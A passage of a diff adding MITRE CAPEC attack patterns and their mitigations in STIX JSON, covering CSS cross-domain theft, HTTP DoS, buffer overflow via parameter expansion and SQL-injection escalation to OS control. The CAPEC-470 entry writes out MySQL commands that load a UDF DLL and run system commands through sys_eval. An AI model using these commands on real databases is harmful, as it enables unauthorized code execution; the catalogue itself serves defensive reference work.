"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5bb90021-f385-4a44-b27b-cecb4dfc0580", + "modified": "2022-02-22T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8127e61d-3ccd-4866-bd76-59c159eeeefe", + "spec_version": "2.1", + "target_ref": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser.", + "external_references": [ + { + "external_id": "CAPEC-468", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/468.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "external_id": "CWE-149", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/149.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-838", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/838.html" + }, + { + "description": "Chris Evans, Generic cross-browser cross-domain theft, 2009--12---28", + "external_id": "REF-405", + "source_name": "reference_from_CAPEC", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html" + } + ], + "id": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Generic Cross-Browser Cross-Domain Theft", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n By having control of some text in the victim's domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that \"does not make sense\". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. 
The stolen data may contain sensitive information, such CSRF protection tokens.\n ", + "x_capec_prerequisites": [ + "No new lines can be present in the injected CSS stringProper HTML or URL escaping of the \" and ' characters is not presentThe attacker has control of two injection points: pre-string and post-string" + ], + "x_capec_resources_required": [ + "Attacker controlled site/page to render a page referencing the injected CSS string" + ], + "x_capec_skills_required": { + "High": "Ability to craft a CSS injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix.", + "id": "course-of-action--ab470916-70bc-4ac8-8e6f-b924a0e868d5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-468-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2069c887-d975-4ee0-993c-8379a0d1af96", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab470916-70bc-4ac8-8e6f-b924a0e868d5", + "spec_version": "2.1", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform proper HTML 
encoding and URL escaping", + "id": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-468-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3d2b93d-bd3c-47a7-a5fc-75b3c56d634b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b11fd1d-aa44-4c8f-a3ae-438fa37413a5", + "spec_version": "2.1", + "target_ref": "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. 
The web server will wait to attacker's responses on the initiated HTTP sessions while the connection threads are being exhausted.", + "external_references": [ + { + "external_id": "CAPEC-469", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/469.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-772", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/772.html" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "Robert Hansen, Slowris HTTP DoS, 2009--06---17", + "external_id": "REF-406", + "source_name": "reference_from_CAPEC", + "url": "http://ha.ckers.org/blog/20090617/slowloris-http-dos/" + } + ], + "id": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP DoS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6e3dda09-c1da-4f44-a0b3-e0e3b6fe0601" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "HTTP protocol is usedWeb server used is vulnerable to denial of service via HTTP flooding" + ], + "x_capec_resources_required": [ + "Ability to issues hundreds of HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Configure web server software to limit the waiting period on opened HTTP sessions", + "id": "course-of-action--cac35d87-f34b-428c-95aa-1e5963873af5", + 
"modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dd88d686-216c-4942-8543-341f79451457", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cac35d87-f34b-428c-95aa-1e5963873af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use load balancing mechanisms", + "id": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--37641472-3448-4011-b562-97904650273a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "spec_version": "2.1", + "target_ref": "attack-pattern--aa92a904-ed9d-4dc3-a01f-c965521e9934", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "In this attack, the target software is given input that the adversary knows will be modified and expanded in size during processing. This attack relies on the target software failing to anticipate that the expanded data may exceed some internal limit, thereby creating a buffer overflow.", + "external_references": [ + { + "external_id": "CAPEC-47", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/47.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-130", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/130.html" + }, + { + "external_id": "CWE-131", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Buffer Overflow via Parameter Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: FTP glob()\n The glob() function in FTP servers has been susceptible to attack as a result of incorrect resizing. This is an ftpd glob() Expansion LIST Heap Overflow Vulnerability. ftp daemon contains a heap-based buffer overflow condition. The overflow occurs when the LIST command is issued with an argument that expands into an oversized string after being processed by glob().\n This buffer overflow occurs in memory that is dynamically allocated. It may be possible for adversaries to exploit this vulnerability and execute arbitrary code on the affected host.\n To exploit this, the adversary must be able to create directories on the target host.\n The glob() function is used to expand short-hand notation into complete file names. 
By sending to the FTP server a request containing a tilde (~) and other wildcard characters in the pathname string, a remote adversary can overflow a buffer and execute arbitrary code on the FTP server to gain root privileges. Once the request is processed, the glob() function expands the user input, which could exceed the expected length. In order to exploit this vulnerability, the adversary must be able to create directories on the FTP server.\n [REF-1]See also: CVE-2001-0249", + "\n Buffer overflow in the glob implementation in libc in NetBSD-current before 20050914, and NetBSD 2.* and 3.* before 20061203, as used by the FTP daemon, allows remote authenticated users to execute arbitrary code via a long pathname that results from path expansion.\n The limit computation of an internal buffer was done incorrectly. The size of the buffer in byte was used as element count, even though the elements of the buffer are 2 bytes long. Long expanded path names would therefore overflow the buffer.See also: CVE-2006-6652" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    In this attack, the normal method of providing large user input does not work. The program performs bounds checking on the user input, but not the expanded user input. The adversary needs to provide input that they believe will be expanded by the program to overflow a buffer. To identify where this is possible, an adversary either needs to have knowledge of the inner workings of the program or use a disassembler and other reverse engineering tools to guide the search.
  3. Craft overflow content: The adversary crafts the input to be given to the program. If the intent is to simply cause the software to crash, the input needs only to expand to an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft input that expands in a way that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

  4. Techniques
    Create specific files and directories on the system and then give input using path traversal shortcuts to those directories that could expand past an input buffer.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary gives the crafted input to the program, overflowing the buffer.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The program expands one of the parameters passed to a function with input controlled by the user, but a later function making use of the expanded parameter erroneously considers the original, not the expanded size of the parameter.", + "The expanded parameter is used in the context where buffer overflow may become possible due to the incorrect understanding of the parameter size (i.e. thinking that it is smaller than it really is)." + ], + "x_capec_resources_required": [ + "Access to the program source or binary. If the program is only available in binary then a disassembler and other reverse engineering tools will be helpful." + ], + "x_capec_skills_required": { + "High": "Finding this particular buffer overflow may not be trivial. Also, stack and especially heap based buffer overflows require a lot of knowledge if the intended goal is arbitrary code execution. Not only that the adversary needs to write the shell code to accomplish their goals, but the adversary also needs to find a way to get the program execution to jump to the planted shell code. There also needs to be sufficient room for the payload. So not every buffer overflow will be exploitable, even by a skilled adversary." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that when parameter expansion happens in the code that the assumptions used to determine the resulting size of the parameter are accurate and that the new size of the parameter is visible to the whole system", + "id": "course-of-action--f3dcafa1-68b1-4610-a489-f68adb1fcaed", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-47-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f17b6dc5-ba75-4137-8d20-e847c4934580", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3dcafa1-68b1-4610-a489-f68adb1fcaed", + "spec_version": "2.1", + "target_ref": "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. 
However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.", + "external_references": [ + { + "external_id": "CAPEC-470", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/470.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "description": "Bernardo Damele Assump ção Guimarães, Advanced SQL Injection to Operating System Full Control, 2009--04---10", + "external_id": "REF-408", + "source_name": "reference_from_CAPEC", + "url": "http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf" + } + ], + "id": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Expanding Control over the Operating System from the Database", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The adversary identifies a database management system running on a machine they would like to gain control over, or on a network they want to move laterally through.

Experiment

  1. The adversary goes about the typical steps of an SQL injection and determines if an injection is possible.

  2. Once the Adversary determines that an SQL injection is possible, they must ensure that the requirements for the attack are met. These are a high privileged session user and batched query support. This is done in similar ways to discovering if an SQL injection is possible.

  3. If the requirements are met, based on the database management system that is running, the adversary will find or create user defined functions (UDFs) that can be loaded as DLLs. An example of a DLL can be found at https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql

  4. In order to load the DLL, the adversary must first find the path to the plugin directory. The command to achieve this is different based on the type of DBMS, but for MySQL, this can be achieved by running the command \"select @@plugin_dir\"

Exploit

  1. The DLL is then moved into the previously found plugin directory so that the contained functions can be loaded. This can be done in a number of ways; loading from a network share, writing the entire hex encoded string to a file in the plugin directory, or loading the DLL into a table and then into a file. An example using MySQL to load the hex string is as follows. select 0x4d5a9000... into dump file \"{plugin directory}\\\\udf.dll\";

  2. Once the DLL is in the plugin directory, a command is then run to load the UDFs. An example of this in MySQL is \"create function sys_eval returns string soname 'udf.dll';\" The function sys_eval is specific to the example DLL listed above.

  3. Once the adversary has loaded the desired function(s), they will use these to execute arbitrary commands on the compromised system. This is done through a simple select command to the loaded UDF. For example: \"select sys_eval('dir');\". Because the prerequisite to this attack is that the database session user is a super user, this means that the adversary will be able to execute commands with elevated privileges.

", + "x_capec_prerequisites": [ + "A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means" + ], + "x_capec_skills_required": { + "High": "Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection", + "id": "course-of-action--95d0b674-30ae-40e9-8db2-38a8a211eb62", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9147a7dc-96c2-41f7-b9c5-b3ef49dcdf38", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95d0b674-30ae-40e9-8db2-38a8a211eb62", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Ensure that the DBMS is patched with the latest security patches", + "id": "course-of-action--57dfed23-ac96-435d-9b02-e9c712b0bb48", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-1", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71f0bd8e-33e6-4ef2-8778-ffdf5c5609a9", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--57dfed23-ac96-435d-9b02-e9c712b0bb48", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS", + "id": "course-of-action--4c4bd6ec-b943-4f42-a425-366871f00c6c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48504b4a-e44a-448e-a9a2-3897cd085eda", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c4bd6ec-b943-4f42-a425-366871f00c6c", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user", + "id": "course-of-action--8a0e8a90-0024-487b-a75a-38d27942b5c3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e9ce000-b8ad-473e-8a4f-892b64b4c43e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a0e8a90-0024-487b-a75a-38d27942b5c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Do not use the DBMS machine for anything else other than the database", + "id": "course-of-action--a1e0c3a0-c417-4924-88b6-f2b4837968a9", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--95f621c4-31d2-4fd4-89e2-7b69c24af990", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--a1e0c3a0-c417-4924-88b6-f2b4837968a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.", + "id": "course-of-action--b79a6e4c-8a5d-4123-8504-1dbec2d44717", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca5847b9-62fc-42d7-8ec4-e4068cd7df27", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b79a6e4c-8a5d-4123-8504-1dbec2d44717", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Use an intrusion detection system to monitor network connections and logs on the database host.", + "id": "course-of-action--f47f9885-ef51-4567-94af-f8a1a131599b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce982c38-66be-4428-a92d-ebb29735fb27", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f47f9885-ef51-4567-94af-f8a1a131599b", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised", + "id": "course-of-action--82f878db-50ad-43ad-b106-177323a07ddc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-470-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7b22a10d-ca9b-4638-b525-d142e88f10e7", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82f878db-50ad-43ad-b106-177323a07ddc", + "spec_version": "2.1", + "target_ref": "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 